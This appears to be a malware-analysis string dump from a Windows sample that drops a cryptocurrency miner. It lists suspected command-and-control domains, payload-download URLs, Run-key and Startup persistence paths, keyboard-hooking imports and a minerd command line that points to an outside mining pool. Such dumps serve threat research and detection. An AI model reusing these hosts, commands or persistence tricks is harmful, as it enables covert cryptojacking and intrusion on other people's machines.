carpetbrownsurface.com
roofingropers.com
greenalgeaocean.com
%original file name%.exe_640_rwx_00400000_00036000:
.text
`.rdata
@.data
user32.dll
kernel32.dll
ShellExecuteW
shell32.dll
ole32.dll
RegCloseKey
RegOpenKeyExW
advapi32.dll
HttpOpenRequestW
HttpSendRequestW
InternetOpenUrlW
wininet.dll
|PAM-U1_0.0.1
Content-Type: application/x-www-form-urlencoded
http://www5.0zz0.com/2014/05/28/22/846767599.png
Shttp://google.com/
http://www6.0zz0.com/2014/05/29/00/888256212.png
http://www13.0zz0.com/2014/05/29/00/562309044.png
minerd.exe
minerd.exe -a scrypt -o stratum tcp://cococairports.com:8081 -u flywifi101.1 -p x
ntdll.dll
0=%s&1=%lu&2=%s&3=%s&4=%s&5=%s&6=%s
0=%s&1=%s
%s\%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
calc.exe
/index.php
HTTP/1.1
carpetbrownsurface.com
roofingropers.com
greenalgeaocean.com
%Documents and Settings%\%current user%\Application Data\wbohuxzhxt.exe
@c:\%original file name%.exe
%Documents and Settings%\%current user%\Start Menu\Programs\Startup
%Documents and Settings%\%current user%\Application Data
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%System%
xncqnyyorsxlq.exe
wbohuxzhxt.exe
%Documents and Settings%\%current user%\Application Data\A901719BDB96997A6903E6D034944796
libcurl.dll
2.5.1
%original file name%.exe_640_rwx_00960000_00018000:
.text
`.rdata
@.data
.rsrc
314127.64
GetProcessWindowStation
ActivateKeyboardLayout
CreateDialogIndirectParamA
EnumChildWindows
EnumThreadWindows
EnumWindows
GetAsyncKeyState
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardLayoutNameA
GetKeyboardState
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
SetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
ShellExecuteA
SHELL32.dll
OPENGL32.dll
CreateIoCompletionPort
GetCPInfo
KERNEL32.dll
u.vr-
KERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
File %PayloadOne was not foundYError: Unable to complete operation %PayloadOne, no %PayloadTwo file has been opened yet.
File %PayloadOne already exists,Invalid Handle, unable to complete operation
-Failed to open file %PayloadOne, error %error*Not enough diskspace to complete operationOFailed to execute
Error: %error.MSI installation failed with error code %erroriAnother installation is already in progress
Operation '%PayloadOne' was not foundYUser has canceled the operation, rolling back changes, If you see this message it's a bug{Insufficient Rights to complete operation
Please be sure you have Administrator rights before attempting installation againDFailed to open requested registry key
Key: %PayloadOne
Error: %error7Requested registry operation failed
Error: Invalid HiveJFailed to create the requested registry key
Error: %errorJFailed to delete the requested registry key
Uninstall the newer version then run setup againIFatal error in the configuration file, examine the log file for more infouError: This product can only be installed on Windows XP or later. Windows 95, 98, ME, NT, and 2000 are not supported.@Failed to create a new thread
Error: Unsupported Bitness
`Unable to find a drive with sufficent free disk space in order to extract the installation files\Error: This product may not be installed on a computer that has Microsoft HyperV installed.oMicrosoft Runtime DLLs cannot be installed on this operating system. Please see Microsoft KB835732 for details.zYou may be running ACE instances. ACE is no longer supported in this version of VMware Player. Continue with installation?
Canceling Operation...
P/L or /lang <English language name> : Specifies a language to run the installer.R/L or /lang <Localized language name> : Specifies a language to run the installer.]/L or /lang <Three letter language abbreviation> : Specifies a language to run the installer.F/L or /lang <Language id> : Specifies a language to run the installer.J/z or /var <"Key"="value" pairs> : Specify a set of variables to override.'/x or /uninst : Uninstalls the product.V/v or /msi_args <"Key"="value" pairs> : Specify a set of arguments to pass to the MSI.C/clean or /clean : Clean out installation registration information.|/nsr or /noSilentReboot : Suppress an automatic reboot after a successful silent install (does not affect installs with UI).</Language></Three></Localized></English>
minerd.exe_364:
.text
``.data
.rdata
0@.bss
.idata
libgcc_s_dw2-1.dll
libgcj-12.dll
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
O%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
1404407002 5702
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
mainCRTStartup
WinMainCRTStartup
_CRT_glob
_CRT_fmode
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
wcrtomb
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/crt1.c
C:\MinGW\msys\1.0\src\mingwrt
__mingw_CRTStartup
../mingw/CRTglob.c
../mingw/CRTfmode.c
../mingw/CRT_fp10.c
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
C:\MinGW\msys\1.0\src\mingwrt\mingwex
%flags
Þst
../../mingw/mingwex/wcrtomb.c
__wcrtomb_cp
crt1.c
CRTglob.c
CRTfmode.c
CRT_fp10.c
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
wcrtomb.c
"@"@"@"@
minerd.exe_364_rwx_00400000_0004E000:
.text
``.data
.rdata
0@.bss
.idata
libgcc_s_dw2-1.dll
libgcj-12.dll
JSON decode of %s failed
http://
https://
stratum tcp://
http://%s
cpuminer 2.3.2
accepted: %lu/%lu (%.2f%%), %s khash/s %s
DEBUG: reject reason: %s
DEBUG: job_id='%s' extranonce2=%s ntime=x
Starting Stratum on %s
...terminating workio thread
...retry after %d seconds
JSON decode failed(%d): %s
{"method": "mining.submit", "params": ["%s", "%s", "%s", "%s", "%s"], "id":4}
{"method": "getwork", "params": [ "%s" ], "id":1}
JSON key '%s' not found
JSON key '%s' is not a string
CURL initialization failed
%s%s%s
Long-polling activated for %s
json_rpc_call failed, retry after %d seconds
DEBUG: got new work in %d ms
Binding thread %d to cpu %d
thread %d: %lu hashes, %s khash/s
Total: %s khash/s
work retrieval failed, exiting mining thread %d
http://127.0.0.1:9332/
%s: unsupported non-option argument '%s'
JSON option %s invalid
https:
%s:%s
thread %d create failed
%d miner threads started, using '%s' algorithm.
cert
userpass
-o, --url=URL URL of mining server (default: http://127.0.0.1:9332/)
-O, --userpass=U:P username:password pair for mining server
-p, --pass=PASSWORD password for mining server
--cert=FILE certificate for mining server using SSL
-x, --proxy=[PROTOCOL://]HOST[:PORT] connect through a proxy
--no-longpoll disable X-Long-Polling support
--no-stratum disable X-Stratum support
[%d-d-d d:d:d] %s
User-Agent: cpuminer/2.3.2
HTTP request failed: %s
JSON-RPC call failed: %s
hex2bin failed on '%s'
DEBUG: %s
Hash: %s
Target: %s
http%s
http_proxy
Stratum connection failed: %s
{"id": 1, "method": "mining.subscribe", "params": []}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2", "%s"]}
{"id": 1, "method": "mining.subscribe", "params": ["cpuminer/2.3.2"]}
mining.notify
Stratum session id: %s
mining.set_difficulty
client.reconnect
stratum tcp://%s:%d
Server requested reconnection to %s
client.get_version
cpuminer/2.3.2
client.show_message
MESSAGE FROM SERVER: %s
{"id": 2, "method": "mining.authorize", "params": ["%s", "%s"]}
%s near '%s'
%s near end of file
unable to decode byte 0x%x at position %d
control character 0x%x
invalid Unicode '\uX\uX'
invalid Unicode '\uX'
end == saved_text lex->saved_text.length
unable to open %s: %s
\ux
\ux\ux
VirtualQuery failed for %d bytes at address %p
Unknown pseudo relocation protocol version %d.
Unknown pseudo relocation bit size %d.
O%s: option requires an argument -- %c
%s: unrecognised option `-%s'
%s: invalid option -- %c
option `%s%s' doesn't accept an argument
option `%s%s' requires an argument
%s: option `%s' is ambiguous
%s: unrecognised option `%s'
1404407002 5702
curl_easy_cleanup
curl_easy_init
curl_easy_perform
curl_easy_reset
curl_easy_setopt
curl_global_init
curl_slist_append
curl_slist_free_all
curl_version
pthread_join
libcurl.dll
KERNEL32.dll
msvcrt.dll
pthreadGC2.dll
WS2_32.dll
mainCRTStartup
WinMainCRTStartup
_CRT_glob
_CRT_fmode
_CRT_MT
___w64_mingwthr_add_key_dtor
___w64_mingwthr_remove_key_dtor
wcrtomb
__mingwthr_key_t
__mingwthr_key
GNU C 4.5.2
../mingw/crt1.c
C:\MinGW\msys\1.0\src\mingwrt
__mingw_CRTStartup
../mingw/CRTglob.c
../mingw/CRTfmode.c
../mingw/CRT_fp10.c
__report_error
../mingw/crtst.c
__mingwthr_run_key_dtors
keyp
new_key
prev_key
cur_key
key_dtor_list
C:\MinGW\msys\1.0\src\mingwrt\mingwex
%flags
Þst
../../mingw/mingwex/wcrtomb.c
__wcrtomb_cp
crt1.c
CRTglob.c
CRTfmode.c
CRT_fp10.c
c:/mingw/bin/../lib/gcc/mingw32/4.5.2/include
crtst.c
wcrtomb.c
"@"@"@"@